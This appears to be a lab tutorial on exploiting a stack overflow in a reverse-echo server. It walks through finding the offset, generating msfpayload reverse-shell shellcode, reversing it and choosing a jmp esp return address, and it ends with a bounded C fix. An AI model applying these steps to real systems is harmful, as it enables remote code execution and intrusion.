Why do I use this software? Because this echo server behaves differently from a normal echo server: it echoes the message back in reverse order.
Does it matter? Yes, it matters when you are developing the exploit. The shellcode has to be reversed, while the return address must not be reversed. That is quite different from normal exploit writing.
I developed this exploit under BackTrack 5 R3 (32-bit). Let's compile the echo server with gcc using the following switches, which disable the stack protector (and RELRO):
gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb
Run the vuln-server:
./vuln-server 5700
Open another terminal and run the client:
nc -vv 127.0.0.1 5700
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
Enter something on the client, for example:
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
hello world
dlrow olleh
You will see that the message you entered is echoed back in reverse order.
The server side displays:
127.0.0.1:41959 hello world
Now, write a Python script that sends 500 bytes of data to the echo server.
Run it and you will see that the EIP register is overwritten with A's.
Next, generate a pattern of 500 unique characters to locate the bytes that overwrite EIP:
./pattern_create.rb 500
Copy the result into the Python script above, replacing the junk with the pattern.
Run the modified Python script again and you will find that EIP is overwritten with 0x416c3341. Because the server reversed our input, reverse the address and find the offset with the following command:
./pattern_offset.rb 0x41336c41 500
[*] Exact match at offset 339
So, the offset is 339.
Now, create the shellcode with msfpayload and encode it with the alpha_upper encoder in order to avoid the bad characters:
msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper
However, we need to reverse the shellcode, which the following Python (2.x) script does:
shellcode = "blah blah ...."          # paste the msfencode output here
shellcode = shellcode[::-1]           # reverse the byte order of the whole string
shellcode = shellcode.encode("hex")   # keep the hex string instead of discarding it
print shellcode
Then, add "\x" back in front of every two characters of the printed hex string.
Okay, it is high time to find the return address:
msfelfscan -j esp vuln-server
[vuln-server]
0x08064e49 push esp; ret
0x08064ea7 push esp; ret
0x08065f71 push esp; ret
0x08081949 push esp; ret
0x08085df9 push esp; retn 0x8934
0x080a56e9 push esp; ret
0x080c37ab jmp esp
0x080c388f jmp esp
0x080c38b7 jmp esp
0x080c3c3f jmp esp
0x080c3d17 jmp esp
0x080c3da7 jmp esp
0x080c3db3 jmp esp
0x080c3dd3 jmp esp
0x080c532b jmp esp   <----- selected this one
I select the last one as the return address.
As I mentioned, this echo server behaves differently from others. The flow of the exploit does not run forward but backward. The final exploit Python script is as follows:
Now, run a listener on port 4444, start the echo server, and then run the exploit Python script. Yeah, we got the shell.
Therefore, never run any program as root.
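The overflow exploited above would not be reachable if the server bounded the copy into its stack buffer. As an added example (not the page's vuln-server.c, whose source is not shown), here is a bounded reverse-echo handler in C; the buffer size ECHO_BUF_SIZE and the QUIT handling are assumptions modelled on the client session shown earlier.

```c
#include <stddef.h>
#include <string.h>

/* Assumed size of the server's line buffer; vuln-server.c is not shown on the page. */
#define ECHO_BUF_SIZE 256

/* Copy at most outsz - 1 bytes of in[0..inlen) into out[] in reverse order and
 * NUL-terminate. Input longer than the buffer is truncated instead of being
 * written past the end of out[], so a 500-byte line can no longer reach the
 * saved return address. Returns the number of payload bytes written. */
size_t reverse_echo_bounded(const char *in, size_t inlen, char *out, size_t outsz)
{
    size_t n, i;

    if (outsz == 0)
        return 0;
    n = inlen < outsz - 1 ? inlen : outsz - 1;   /* bytes we can actually keep */
    for (i = 0; i < n; i++)
        out[i] = in[n - 1 - i];                  /* last byte of the kept prefix first */
    out[n] = '\0';
    return n;
}

/* Handle one received line: strip a trailing "\n" or "\r\n", return 1 for a
 * bare "QUIT" line so the caller closes the connection, otherwise build the
 * reversed reply in reply[] (replysz bytes) and return 0. */
int handle_echo_line(const char *line, size_t len, char *reply, size_t replysz)
{
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;
    if (len == 4 && memcmp(line, "QUIT", 4) == 0)
        return 1;
    reverse_echo_bounded(line, len, reply, replysz);
    return 0;
}
```

With this handler the 500-byte test from the walkthrough is cut to 255 bytes and echoed back reversed, rather than overwriting EIP.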
That's all! See you.